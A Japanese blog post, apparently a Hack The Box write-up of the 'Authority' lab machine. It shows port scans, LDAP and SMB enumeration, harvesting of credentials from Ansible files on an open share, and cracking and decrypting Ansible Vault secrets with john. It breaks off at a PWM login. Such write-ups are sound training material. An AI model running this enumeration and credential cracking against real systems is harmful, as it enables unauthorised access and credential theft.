これは ZOZO Advent Calendar 2023 カレンダーVol.4の3日目の記事です。昨日の投稿は@YasuhiroKimesawaさんの「いまさら!いまこそ!ニコニコカレンダー!」でした。
初めに
本記事は Hack The Box(以下リンク参照)の「Authority」にチャレンジした際のWriteupになります。
※悪用するのはやめてください。あくまで社会への貢献のためにこれらの技術を使用してください。法に触れるので。
初期探索
まずHTBのマシンでは攻略対象のIPが1つ与えられます。
このIPに対してVPN接続越しにポートスキャンを行い、空いているPortを探します。
ポートスキャン
RustScanを利用します。
┌──(root㉿kali)-[~]
└─# rustscan -a 10.129.11.155 --top --ulimit 5000
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: https://discord.gg/GFrQsGy :
: https://github.com/RustScan/RustScan :
--------------------------------------
Real hackers hack time ⌛
[~] The config file is expected to be at "/root/.rustscan.toml"
[~] Automatically increasing ulimit value to 5000.
Open 10.129.11.155:53
Open 10.129.11.155:80
Open 10.129.11.155:88
Open 10.129.11.155:135
Open 10.129.11.155:139
Open 10.129.11.155:389
Open 10.129.11.155:445
Open 10.129.11.155:464
Open 10.129.11.155:593
Open 10.129.11.155:636
Open 10.129.11.155:5985
Open 10.129.11.155:3269
Open 10.129.11.155:3268
Open 10.129.11.155:8443
Open 10.129.11.155:9389
Open 10.129.11.155:49664
Open 10.129.11.155:49666
Open 10.129.11.155:49667
Open 10.129.11.155:49665
Open 10.129.11.155:49671
Open 10.129.11.155:49686
Open 10.129.11.155:49687
Open 10.129.11.155:49690
Open 10.129.11.155:49689
Open 10.129.11.155:49699
Open 10.129.11.155:49714
Open 10.129.11.155:49719
Open 10.129.11.155:47001
[~] Starting Script(s)
[>] Script to be run Some("nmap -vvv -p {{port}} {{ip}}")
[~] Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-15 21:14 EDT
Initiating Ping Scan at 21:14
Scanning 10.129.11.155 [4 ports]
Completed Ping Scan at 21:14, 0.27s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 21:14
Completed Parallel DNS resolution of 1 host. at 21:14, 0.01s elapsed
DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 21:14
Scanning 10.129.11.155 [28 ports]
Discovered open port 135/tcp on 10.129.11.155
Discovered open port 53/tcp on 10.129.11.155
Discovered open port 139/tcp on 10.129.11.155
Discovered open port 49666/tcp on 10.129.11.155
Discovered open port 80/tcp on 10.129.11.155
Discovered open port 3268/tcp on 10.129.11.155
Discovered open port 445/tcp on 10.129.11.155
Discovered open port 88/tcp on 10.129.11.155
Discovered open port 636/tcp on 10.129.11.155
Discovered open port 49671/tcp on 10.129.11.155
Discovered open port 8443/tcp on 10.129.11.155
Discovered open port 47001/tcp on 10.129.11.155
Discovered open port 49719/tcp on 10.129.11.155
Discovered open port 5985/tcp on 10.129.11.155
Discovered open port 49667/tcp on 10.129.11.155
Discovered open port 9389/tcp on 10.129.11.155
Discovered open port 49664/tcp on 10.129.11.155
Discovered open port 464/tcp on 10.129.11.155
Discovered open port 49665/tcp on 10.129.11.155
Discovered open port 49686/tcp on 10.129.11.155
Discovered open port 49690/tcp on 10.129.11.155
Discovered open port 49714/tcp on 10.129.11.155
Discovered open port 49689/tcp on 10.129.11.155
Discovered open port 593/tcp on 10.129.11.155
Discovered open port 49699/tcp on 10.129.11.155
Discovered open port 49687/tcp on 10.129.11.155
Discovered open port 389/tcp on 10.129.11.155
Discovered open port 3269/tcp on 10.129.11.155
Completed SYN Stealth Scan at 21:14, 0.54s elapsed (28 total ports)
Nmap scan report for 10.129.11.155
Host is up, received echo-reply ttl 127 (0.26s latency).
Scanned at 2023-07-15 21:14:52 EDT for 1s
PORT STATE SERVICE REASON
53/tcp open domain syn-ack ttl 127
80/tcp open http syn-ack ttl 127
88/tcp open kerberos-sec syn-ack ttl 127
135/tcp open msrpc syn-ack ttl 127
139/tcp open netbios-ssn syn-ack ttl 127
389/tcp open ldap syn-ack ttl 127
445/tcp open microsoft-ds syn-ack ttl 127
464/tcp open kpasswd5 syn-ack ttl 127
593/tcp open http-rpc-epmap syn-ack ttl 127
636/tcp open ldapssl syn-ack ttl 127
3268/tcp open globalcatLDAP syn-ack ttl 127
3269/tcp open globalcatLDAPssl syn-ack ttl 127
5985/tcp open wsman syn-ack ttl 127
8443/tcp open https-alt syn-ack ttl 127
9389/tcp open adws syn-ack ttl 127
47001/tcp open winrm syn-ack ttl 127
49664/tcp open unknown syn-ack ttl 127
49665/tcp open unknown syn-ack ttl 127
49666/tcp open unknown syn-ack ttl 127
49667/tcp open unknown syn-ack ttl 127
49671/tcp open unknown syn-ack ttl 127
49686/tcp open unknown syn-ack ttl 127
49687/tcp open unknown syn-ack ttl 127
49689/tcp open unknown syn-ack ttl 127
49690/tcp open unknown syn-ack ttl 127
49699/tcp open unknown syn-ack ttl 127
49714/tcp open unknown syn-ack ttl 127
49719/tcp open unknown syn-ack ttl 127
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.92 seconds
Raw packets sent: 32 (1.384KB) | Rcvd: 29 (1.260KB)
Windows環境ぽいです。色々とPortが開いているので、情報を収集していきます。
ldapのプロトコルからルートDSA固有エントリを取得する。
┌──(root㉿kali)-[~]
└─# nmap -p 389 -n -Pn --open 10.129.11.155 --script ldap-rootdse
Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-15 21:20 EDT
Nmap scan report for 10.129.11.155
Host is up (0.25s latency).
PORT STATE SERVICE
389/tcp open ldap
| ldap-rootdse:
| LDAP Results
| <ROOT>
| domainFunctionality: 7
| forestFunctionality: 7
| domainControllerFunctionality: 7
| rootDomainNamingContext: DC=authority,DC=htb
| ldapServiceName: authority.htb:authority$@AUTHORITY.HTB
| isGlobalCatalogReady: TRUE
| supportedSASLMechanisms: GSSAPI
| supportedSASLMechanisms: GSS-SPNEGO
| supportedSASLMechanisms: EXTERNAL
| supportedSASLMechanisms: DIGEST-MD5
| supportedLDAPVersion: 3
| supportedLDAPVersion: 2
| supportedLDAPPolicies: MaxPoolThreads
| supportedLDAPPolicies: MaxPercentDirSyncRequests
| supportedLDAPPolicies: MaxDatagramRecv
| supportedLDAPPolicies: MaxReceiveBuffer
| supportedLDAPPolicies: InitRecvTimeout
| supportedLDAPPolicies: MaxConnections
| supportedLDAPPolicies: MaxConnIdleTime
| supportedLDAPPolicies: MaxPageSize
| supportedLDAPPolicies: MaxBatchReturnMessages
| supportedLDAPPolicies: MaxQueryDuration
| supportedLDAPPolicies: MaxDirSyncDuration
| supportedLDAPPolicies: MaxTempTableSize
| supportedLDAPPolicies: MaxResultSetSize
| supportedLDAPPolicies: MinResultSets
| supportedLDAPPolicies: MaxResultSetsPerConn
| supportedLDAPPolicies: MaxNotificationPerConn
| supportedLDAPPolicies: MaxValRange
| supportedLDAPPolicies: MaxValRangeTransitive
| supportedLDAPPolicies: ThreadMemoryLimit
| supportedLDAPPolicies: SystemMemoryLimitPercent
| supportedControl: 1.2.840.113556.1.4.319
| supportedControl: 1.2.840.113556.1.4.801
| supportedControl: 1.2.840.113556.1.4.473
| supportedControl: 1.2.840.113556.1.4.528
| supportedControl: 1.2.840.113556.1.4.417
| supportedControl: 1.2.840.113556.1.4.619
| supportedControl: 1.2.840.113556.1.4.841
| supportedControl: 1.2.840.113556.1.4.529
| supportedControl: 1.2.840.113556.1.4.805
| supportedControl: 1.2.840.113556.1.4.521
| supportedControl: 1.2.840.113556.1.4.970
| supportedControl: 1.2.840.113556.1.4.1338
| supportedControl: 1.2.840.113556.1.4.474
| supportedControl: 1.2.840.113556.1.4.1339
| supportedControl: 1.2.840.113556.1.4.1340
| supportedControl: 1.2.840.113556.1.4.1413
| supportedControl: 2.16.840.1.113730.3.4.9
| supportedControl: 2.16.840.1.113730.3.4.10
| supportedControl: 1.2.840.113556.1.4.1504
| supportedControl: 1.2.840.113556.1.4.1852
| supportedControl: 1.2.840.113556.1.4.802
| supportedControl: 1.2.840.113556.1.4.1907
| supportedControl: 1.2.840.113556.1.4.1948
| supportedControl: 1.2.840.113556.1.4.1974
| supportedControl: 1.2.840.113556.1.4.1341
| supportedControl: 1.2.840.113556.1.4.2026
| supportedControl: 1.2.840.113556.1.4.2064
| supportedControl: 1.2.840.113556.1.4.2065
| supportedControl: 1.2.840.113556.1.4.2066
| supportedControl: 1.2.840.113556.1.4.2090
| supportedControl: 1.2.840.113556.1.4.2205
| supportedControl: 1.2.840.113556.1.4.2204
| supportedControl: 1.2.840.113556.1.4.2206
| supportedControl: 1.2.840.113556.1.4.2211
| supportedControl: 1.2.840.113556.1.4.2239
| supportedControl: 1.2.840.113556.1.4.2255
| supportedControl: 1.2.840.113556.1.4.2256
| supportedControl: 1.2.840.113556.1.4.2309
| supportedControl: 1.2.840.113556.1.4.2330
| supportedControl: 1.2.840.113556.1.4.2354
| supportedCapabilities: 1.2.840.113556.1.4.800
| supportedCapabilities: 1.2.840.113556.1.4.1670
| supportedCapabilities: 1.2.840.113556.1.4.1791
| supportedCapabilities: 1.2.840.113556.1.4.1935
| supportedCapabilities: 1.2.840.113556.1.4.2080
| supportedCapabilities: 1.2.840.113556.1.4.2237
| subschemaSubentry: CN=Aggregate,CN=Schema,CN=Configuration,DC=authority,DC=htb
| serverName: CN=AUTHORITY,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=authority,DC=htb
| schemaNamingContext: CN=Schema,CN=Configuration,DC=authority,DC=htb
| namingContexts: DC=authority,DC=htb
| namingContexts: CN=Configuration,DC=authority,DC=htb
| namingContexts: CN=Schema,CN=Configuration,DC=authority,DC=htb
| namingContexts: DC=DomainDnsZones,DC=authority,DC=htb
| namingContexts: DC=ForestDnsZones,DC=authority,DC=htb
| isSynchronized: TRUE
| highestCommittedUSN: 266468
| dsServiceName: CN=NTDS Settings,CN=AUTHORITY,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=authority,DC=htb
| dnsHostName: authority.authority.htb
| defaultNamingContext: DC=authority,DC=htb
| currentTime: 20230716052122.0Z
|_ configurationNamingContext: CN=Configuration,DC=authority,DC=htb
Service Info: Host: AUTHORITY; OS: Windows
Nmap done: 1 IP address (1 host up) scanned in 1.41 seconds
dnsHostName: authority.authority.htbからドメインの情報がわかりました。
80のPortが開いているのでこのPortにアクセスしてみます。
ただのIISなので別のルートから情報収集します。
rpcclient
RPCが開いているので列挙できるか試します。
┌──(root㉿kali)-[~]
└─# rpcclient 10.129.11.155 -U '' -N
rpcclient $> enumdomains
do_cmd: Could not initialise samr. Error was NT_STATUS_ACCESS_DENIED
rpcclient $> enumdomgroups
do_cmd: Could not initialise samr. Error was NT_STATUS_ACCESS_DENIED
rpcclient $> lsaquery
do_cmd: Could not initialise lsarpc. Error was NT_STATUS_ACCESS_DENIED
rpcclient $> querydominfo
do_cmd: Could not initialise samr. Error was NT_STATUS_ACCESS_DENIED
rpcclient $>
ダメでした。
SMB
Port139, 445があいているのでSMB通信が出来るか試してみる。
もしかしたらなにかヒントになるファイルが落ちている可能性があるので。
パスワードなしで見ることが出来る領域を探っていく。
┌──(root㉿kali)-[~]
└─# smbclient -N -L \\\\10.129.11.155
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
Department Shares Disk
Development Disk
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
SYSVOL Disk Logon server share
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.129.11.155 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
Development, Department Shares Diskが怪しいのでここから探っていく。
Department Shares DiskはアクセスできなかったのでDevelopment階層にアクセスしてみる。
┌──(root㉿kali)-[~/work]
└─# smbclient -N \\\\10.129.11.155\\Development
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Fri Mar 17 09:20:38 2023
.. D 0 Fri Mar 17 09:20:38 2023
Automation D 0 Fri Mar 17 09:20:40 2023
cd
5888511 blocks of size 4096. 1335841 blocks available
smb: \> cd Automation
smb: \Automation\> dir
. D 0 Fri Mar 17 09:20:40 2023
.. D 0 Fri Mar 17 09:20:40 2023
Ansible D 0 Fri Mar 17 09:20:50 2023
5888511 blocks of size 4096. 1335841 blocks available
インフラ自動化Tool(Ansible)の階層が見える。この階層を再帰的に回収する。
smb: \Automation\> mask ""
smb: \Automation\> recurse ON
smb: \Automation\> prompt OFF
smb: \Automation\> mget *
getting file \Automation\Ansible\ADCS\.ansible-lint of size 259 as Ansible/ADCS/.ansible-lint (0.2 KiloBytes/sec) (average 0.2 KiloBytes/sec)
getting file \Automation\Ansible\ADCS\.yamllint of size 205 as Ansible/ADCS/.yamllint (0.2 KiloBytes/sec) (average 0.2 KiloBytes/sec)
getting file \Automation\Ansible\ADCS\LICENSE of size 11364 as Ansible/ADCS/LICENSE (10.9 KiloBytes/sec) (average 3.8 KiloBytes/sec)
getting file \Automation\Ansible\ADCS\README.md of size 7279 as Ansible/ADCS/README.md (7.0 KiloBytes/sec) (average 4.6 KiloBytes/sec)
getting file \Automation\Ansible\ADCS\requirements.txt of size 466 as Ansible/ADCS/requirements.txt (0.4 KiloBytes/sec) (average 3.8 KiloBytes/sec)
getting file \Automation\Ansible\ADCS\requirements.yml of size 264 as Ansible/ADCS/requirements.yml (0.3 KiloBytes/sec) (average 3.2 KiloBytes/sec)
getting file \Automation\Ansible\ADCS\SECURITY.md of size 924 as Ansible/ADCS/SECURITY.md (0.9 KiloBytes/sec) (average 2.9 KiloBytes/sec)
getting file \Automation\Ansible\ADCS\tox.ini of size 419 as Ansible/ADCS/tox.ini (0.4 KiloBytes/sec) (average 2.5 KiloBytes/sec)
getting file \Automation\Ansible\LDAP\.travis.yml of size 1414 as Ansible/LDAP/.travis.yml (1.4 KiloBytes/sec) (average 2.4 KiloBytes/sec)
getting file \Automation\Ansible\LDAP\README.md of size 5768 as Ansible/LDAP/README.md (5.4 KiloBytes/sec) (average 2.7 KiloBytes/sec)
getting file \Automation\Ansible\LDAP\TODO.md of size 119 as Ansible/LDAP/TODO.md (0.1 KiloBytes/sec) (average 2.5 KiloBytes/sec)
getting file \Automation\Ansible\LDAP\Vagrantfile of size 640 as Ansible/LDAP/Vagrantfile (0.6 KiloBytes/sec) (average 2.3 KiloBytes/sec)
getting file \Automation\Ansible\PWM\ansible.cfg of size 491 as Ansible/PWM/ansible.cfg (0.5 KiloBytes/sec) (average 2.2 KiloBytes/sec)
getting file \Automation\Ansible\PWM\ansible_inventory of size 174 as Ansible/PWM/ansible_inventory (0.2 KiloBytes/sec) (average 2.0 KiloBytes/sec)
getting file \Automation\Ansible\PWM\README.md of size 1290 as Ansible/PWM/README.md (1.2 KiloBytes/sec) (average 2.0 KiloBytes/sec)
getting file \Automation\Ansible\ADCS\defaults\main.yml of size 1578 as Ansible/ADCS/defaults/main.yml (1.5 KiloBytes/sec) (average 2.0 KiloBytes/sec)
getting file \Automation\Ansible\ADCS\meta\main.yml of size 549 as Ansible/ADCS/meta/main.yml (0.5 KiloBytes/sec) (average 1.9 KiloBytes/sec)
getting file \Automation\Ansible\ADCS\meta\preferences.yml of size 22 as Ansible/ADCS/meta/preferences.yml (0.0 KiloBytes/sec) (average 1.8 KiloBytes/sec)
getting file \Automation\Ansible\ADCS\tasks\assert.yml of size 2936 as Ansible/ADCS/tasks/assert.yml (2.8 KiloBytes/sec) (average 1.8 KiloBytes/sec)
getting file \Automation\Ansible\ADCS\tasks\generate_ca_certs.yml of size 2262 as Ansible/ADCS/tasks/generate_ca_certs.yml (2.2 KiloBytes/sec) (average 1.8 KiloBytes/sec)
getting file \Automation\Ansible\ADCS\tasks\init_ca.yml of size 1244 as Ansible/ADCS/tasks/init_ca.yml (1.2 KiloBytes/sec) (average 1.8 KiloBytes/sec)
getting file \Automation\Ansible\ADCS\tasks\main.yml of size 1359 as Ansible/ADCS/tasks/main.yml (1.3 KiloBytes/sec) (average 1.8 KiloBytes/sec)
getting file \Automation\Ansible\ADCS\tasks\requests.yml of size 4214 as Ansible/ADCS/tasks/requests.yml (4.0 KiloBytes/sec) (average 1.9 KiloBytes/sec)
getting file \Automation\Ansible\ADCS\templates\extensions.cnf.j2 of size 1659 as Ansible/ADCS/templates/extensions.cnf.j2 (1.6 KiloBytes/sec) (average 1.9 KiloBytes/sec)
getting file \Automation\Ansible\ADCS\templates\openssl.cnf.j2 of size 11294 as Ansible/ADCS/templates/openssl.cnf.j2 (10.6 KiloBytes/sec) (average 2.2 KiloBytes/sec)
getting file \Automation\Ansible\ADCS\vars\main.yml of size 2146 as Ansible/ADCS/vars/main.yml (2.0 KiloBytes/sec) (average 2.2 KiloBytes/sec)
getting file \Automation\Ansible\LDAP\.bin\clean_vault of size 677 as Ansible/LDAP/.bin/clean_vault (0.6 KiloBytes/sec) (average 2.2 KiloBytes/sec)
getting file \Automation\Ansible\LDAP\.bin\diff_vault of size 357 as Ansible/LDAP/.bin/diff_vault (0.3 KiloBytes/sec) (average 2.1 KiloBytes/sec)
getting file \Automation\Ansible\LDAP\.bin\smudge_vault of size 768 as Ansible/LDAP/.bin/smudge_vault (0.7 KiloBytes/sec) (average 2.1 KiloBytes/sec)
getting file \Automation\Ansible\LDAP\defaults\main.yml of size 1046 as Ansible/LDAP/defaults/main.yml (1.0 KiloBytes/sec) (average 2.0 KiloBytes/sec)
getting file \Automation\Ansible\LDAP\files\pam_mkhomedir of size 170 as Ansible/LDAP/files/pam_mkhomedir (0.2 KiloBytes/sec) (average 2.0 KiloBytes/sec)
getting file \Automation\Ansible\LDAP\handlers\main.yml of size 277 as Ansible/LDAP/handlers/main.yml (0.3 KiloBytes/sec) (average 1.9 KiloBytes/sec)
getting file \Automation\Ansible\LDAP\meta\main.yml of size 416 as Ansible/LDAP/meta/main.yml (0.4 KiloBytes/sec) (average 1.9 KiloBytes/sec)
getting file \Automation\Ansible\LDAP\tasks\main.yml of size 5235 as Ansible/LDAP/tasks/main.yml (4.9 KiloBytes/sec) (average 2.0 KiloBytes/sec)
getting file \Automation\Ansible\LDAP\templates\ldap_sudo_groups.j2 of size 131 as Ansible/LDAP/templates/ldap_sudo_groups.j2 (0.1 KiloBytes/sec) (average 1.9 KiloBytes/sec)
getting file \Automation\Ansible\LDAP\templates\ldap_sudo_users.j2 of size 106 as Ansible/LDAP/templates/ldap_sudo_users.j2 (0.1 KiloBytes/sec) (average 1.9 KiloBytes/sec)
getting file \Automation\Ansible\LDAP\templates\sssd.conf.j2 of size 2556 as Ansible/LDAP/templates/sssd.conf.j2 (2.4 KiloBytes/sec) (average 1.9 KiloBytes/sec)
getting file \Automation\Ansible\LDAP\templates\sudo_group.j2 of size 30 as Ansible/LDAP/templates/sudo_group.j2 (0.0 KiloBytes/sec) (average 1.8 KiloBytes/sec)
getting file \Automation\Ansible\LDAP\vars\debian.yml of size 174 as Ansible/LDAP/vars/debian.yml (0.2 KiloBytes/sec) (average 1.8 KiloBytes/sec)
getting file \Automation\Ansible\LDAP\vars\main.yml of size 75 as Ansible/LDAP/vars/main.yml (0.1 KiloBytes/sec) (average 1.7 KiloBytes/sec)
getting file \Automation\Ansible\LDAP\vars\redhat.yml of size 222 as Ansible/LDAP/vars/redhat.yml (0.2 KiloBytes/sec) (average 1.7 KiloBytes/sec)
getting file \Automation\Ansible\LDAP\vars\ubuntu-14.04.yml of size 203 as Ansible/LDAP/vars/ubuntu-14.04.yml (0.2 KiloBytes/sec) (average 1.7 KiloBytes/sec)
getting file \Automation\Ansible\PWM\defaults\main.yml of size 1591 as Ansible/PWM/defaults/main.yml (1.5 KiloBytes/sec) (average 1.7 KiloBytes/sec)
getting file \Automation\Ansible\PWM\handlers\main.yml of size 4 as Ansible/PWM/handlers/main.yml (0.0 KiloBytes/sec) (average 1.6 KiloBytes/sec)
getting file \Automation\Ansible\PWM\meta\main.yml of size 199 as Ansible/PWM/meta/main.yml (0.2 KiloBytes/sec) (average 1.6 KiloBytes/sec)
getting file \Automation\Ansible\PWM\tasks\main.yml of size 1832 as Ansible/PWM/tasks/main.yml (1.8 KiloBytes/sec) (average 1.6 KiloBytes/sec)
getting file \Automation\Ansible\PWM\templates\context.xml.j2 of size 422 as Ansible/PWM/templates/context.xml.j2 (0.4 KiloBytes/sec) (average 1.6 KiloBytes/sec)
getting file \Automation\Ansible\PWM\templates\tomcat-users.xml.j2 of size 388 as Ansible/PWM/templates/tomcat-users.xml.j2 (0.4 KiloBytes/sec) (average 1.5 KiloBytes/sec)
getting file \Automation\Ansible\SHARE\tasks\main.yml of size 1876 as Ansible/SHARE/tasks/main.yml (1.8 KiloBytes/sec) (average 1.5 KiloBytes/sec)
getting file \Automation\Ansible\ADCS\molecule\default\converge.yml of size 106 as Ansible/ADCS/molecule/default/converge.yml (0.1 KiloBytes/sec) (average 1.5 KiloBytes/sec)
getting file \Automation\Ansible\ADCS\molecule\default\molecule.yml of size 526 as Ansible/ADCS/molecule/default/molecule.yml (0.5 KiloBytes/sec) (average 1.5 KiloBytes/sec)
getting file \Automation\Ansible\ADCS\molecule\default\prepare.yml of size 371 as Ansible/ADCS/molecule/default/prepare.yml (0.4 KiloBytes/sec) (average 1.5 KiloBytes/sec)
smb: \Automation\>
色々ファイルがありそう。調査が大変ですな。
クレデンシャルアクセス
調査
SMB経由で収集したファイルから何か情報がないか集めると、以下のクレデンシャルが見つかりました。
┌──(root㉿kali)-[~/work/Ansible/PWM]
└─# cat ansible_inventory
ansible_user: administrator
ansible_password: Welcome1
ansible_port: 5985
ansible_connection: winrm
ansible_winrm_transport: ntlm
ansible_winrm_server_cert_validation: ignore
┌──(root㉿kali)-[~/work/Ansible/PWM]
└─# cat defaults/main.yml
---
pwm_run_dir: "{{ lookup('env', 'PWD') }}"
pwm_hostname: authority.htb.corp
pwm_http_port: "{{ http_port }}"
pwm_https_port: "{{ https_port }}"
pwm_https_enable: true
pwm_require_ssl: false
pwm_admin_login: !vault |
$ANSIBLE_VAULT;1.1;AES256
32666534386435366537653136663731633138616264323230383566333966346662313161326239
6134353663663462373265633832356663356239383039640a346431373431666433343434366139
35653634376333666234613466396534343030656165396464323564373334616262613439343033
6334326263326364380a653034313733326639323433626130343834663538326439636232306531
3438
pwm_admin_password: !vault |
$ANSIBLE_VAULT;1.1;AES256
31356338343963323063373435363261323563393235633365356134616261666433393263373736
3335616263326464633832376261306131303337653964350a363663623132353136346631396662
38656432323830393339336231373637303535613636646561653637386634613862316638353530
3930356637306461350a316466663037303037653761323565343338653934646533663365363035
6531
ldap_uri: ldap://127.0.0.1/
ldap_base_dn: "DC=authority,DC=htb"
ldap_admin_password: !vault |
$ANSIBLE_VAULT;1.1;AES256
63303831303534303266356462373731393561313363313038376166336536666232626461653630
3437333035366235613437373733316635313530326639330a643034623530623439616136363563
34646237336164356438383034623462323531316333623135383134656263663266653938333334
3238343230333633350a646664396565633037333431626163306531336336326665316430613566
3764
┌──(root㉿kali)-[~/work/Ansible/LDAP]
└─# cat .travis.yml
---
language: python
python: "2.7"
# Use the new container infrastructure
sudo: false
# Install ansible
addons:
apt:
packages:
- python-pip
env:
global:
- secure: "YP54FaEPVveTtCzlJG3YPuhxUFQvbVkr1L/AA9NM9rwFciwQcLtIXD9iljD17xzoXRwvooNW90eX8XMR2zkhqzU9C+n3kHw2iQVtAdbI1X59lGAXAT7WBMlU6auFsoVzkFibHxJ1W9R1o5JE2iTdDuR0UzQNaTgLn3Dgt7iOWzwNni3dmqdtbPXY7e5x+JhlKHOU53bGnLxFVmbTWzu0Z8ZDuVvh01azHdR0sj8KmC4c8A8atZU0f2f4YyG/26tx78U6RmNFyj2UTmOHRgOtcQVOzfadbI9gZuc1U5JIkS0FEwZYaJOMYhohAqp9Aumo+cuPVJCvjaEXrlvEe4DAJ6aFigT+JR6NY7w+fgoK57HTgC/y7chY30+34ggp+/0aWmXFqdDUbFWs9ovhf0hVL4AcU+31BWdrEmuJjXAGaGMSrdTYJpMFsnjIqe3bUimH1LEm4+wogD/poGSkRsv9R7j1OeQotVDaivRh6WOBdbXEw5HENczsBzD3TztN8A54UzvVnrMnoPI+aH2uvSm/5JVvqWzWEzZHIpep7lbTgRk/1yjxQk6mXDGtrd9uo4e7ZeEr3rBqtA6qI4VggugHIbLGtqQvINdV9fOnDB1sLlslLEIKfT8BLpnDncPYYVV0r0wyC5ySP+RX7nqsixX5oOR7a1UyXBBQ9D0CX3x7x0Y="
install:
# Install ansible
- pip install ansible
# Check ansible version
- ansible --version
# Create ansible.cfg with correct roles_path
- printf '[defaults]\nroles_path=../' >ansible.cfg
before_script:
- echo "$VAULT_PASSWORD" > .vault_password
script:
# Basic role syntax check
- ansible-playbook tests/travis.yml -i localhost, --vault-password-file .vault_password --syntax-check
notifications:
webhooks:
urls:
- https://galaxy.ansible.com/api/v1/notifications/
- https://t2d.idolactiviti.es/notify
┌──(root㉿kali)-[~/work/Ansible/ADCS/defaults]
└─# cat main.yml
---
# defaults file for ca
# set ca_init: 'yes' to create CA
ca_init: yes
# ca_own_root: 'yes' if you want to have yout own root CA.
# if no, set ca_certificate_path manually
ca_own_root: yes
# A passphrase for the CA key.
ca_passphrase: SuP3rS3creT
# The common name for the CA.
ca_common_name: authority.htb
# Other details for the CA.
ca_country_name: NL
ca_email_address: admin@authority.htb
ca_organization_name: htb
ca_organizational_unit_name: htb
ca_state_or_province_name: Utrecht
ca_locality_name: Utrecht
┌──(root㉿kali)-[~/work/Ansible/PWM/templates]
└─# cat tomcat-users.xml.j2
<?xml version='1.0' encoding='cp1252'?>
<tomcat-users xmlns="http://tomcat.apache.org/xml" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://tomcat.apache.org/xml tomcat-users.xsd"
version="1.0">
<user username="admin" password="T0mc@tAdm1n" roles="manager-gui"/>
<user username="robot" password="T0mc@tR00t" roles="manager-script"/>
</tomcat-users>
色々見つかったがwinrmでのログインは全部弾かれました。もう少し捻る必要がありそうです。
Ansible Vault
PWM/defaults/main.ymlの階層にあるansible vaultについて調べてみると、以下のNFLabsさんの記事を見つけた。
この手順でvaultを復号できそうなので、復号してみます。
以下のようにvaultを記載したファイルを作成します(pwm_admin_passwordを例としました)。
pwm_admin_password
$ANSIBLE_VAULT;1.1;AES256
31356338343963323063373435363261323563393235633365356134616261666433393263373736
3335616263326464633832376261306131303337653964350a363663623132353136346631396662
38656432323830393339336231373637303535613636646561653637386634613862316638353530
3930356637306461350a316466663037303037653761323565343338653934646533663365363035
6531
これでjohnさん用にハッシュを作成します。
┌──(root㉿kali)-[~/work]
└─# ansible2john pwm_admin_password
pwm_admin_password:$ansible$0*0*15c849c20c74562a25c925c3e5a4abafd392c77635abc2ddc827ba0a1037e9d5*1dff07007e7a25e438e94de3f3e605e1*66cb125164f19fb8ed22809393b1767055a66deae678f4a8b1f8550905f70da5
ここでjohnさんにpassフレーズを解読してもらいます。
┌──(root㉿kali)-[~/work]
└─# john hash --wordlist=./rockyou.txt
Created directory: /root/.john
Using default input encoding: UTF-8
Loaded 1 password hash (ansible, Ansible Vault [PBKDF2-SHA256 HMAC-256 128/128 SSE2 4x])
Cost 1 (iteration count) is 10000 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
!@#$%^&* (pwm_admin_password)
1g 0:00:00:40 DONE (2023-07-16 22:51) 0.02472g/s 983.7p/s 983.7c/s 983.7C/s 001983..woodson
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
同様に残り2つも解読します。
┌──(root㉿kali)-[~/work]
└─# john hash --wordlist=./rockyou.txt
Using default input encoding: UTF-8
Loaded 2 password hashes with 2 different salts (ansible, Ansible Vault [PBKDF2-SHA256 HMAC-256 128/128 SSE2 4x])
Cost 1 (iteration count) is 10000 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
!@#$%^&* (pwm_admin_login)
!@#$%^&* (ldap_admin_password)
2g 0:00:01:47 DONE (2023-07-16 22:55) 0.01859g/s 370.0p/s 740.0c/s 740.0C/s 001983..woodson
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
一緒のフレーズみたいなので、このフレーズを用いてansible vaultをデコードします。
┌──(root㉿kali)-[~/work]
└─# ansible-vault decrypt ldap_admin_password
Vault password:
Decryption successful
┌──(root㉿kali)-[~/work]
└─# cat ldap_admin_password
DevT3st@123
┌──(root㉿kali)-[~/work]
└─# ansible-vault decrypt pwm_admin_password
Vault password:
Decryption successful
┌──(root㉿kali)-[~/work]
└─# cat pwm_admin_password
pWm_@dm!N_!23
┌──(root㉿kali)-[~/work]
└─# ansible-vault decrypt pwm_admin_login
Vault password:
Decryption successful
┌──(root㉿kali)-[~/work]
└─# cat pwm_admin_login
svc_pwm
色々新たなクレデンシャルが出てきたが、これでもwinrmさんでログインできない!!
また別のルートを探索する必要がありそうです。
project-PWM
今まで収集してきた内容を見返すと、ポートスキャンで8443という気になるPortを発見する。
これはWellkownではないが、たまに開発者がHTTPS443のPortを開発用に8443で設計したりすることがあります。
※ここら辺は開発者側の感覚かなと思われる。
このPortにアクセスしてみます。
なんだこれはパスワードマネージャー??
調査してみると以下のサイトが見つかります。
もう少し調べてみるとGithubも見つけました。
このパスワードマネージャーがデフォルトで8443のPortを使用するみたいです。
こいつにさっきのpwm_admin_password のパスワードを入れてログインしてみます(ConfigEditorから入らないと弾かれます)。
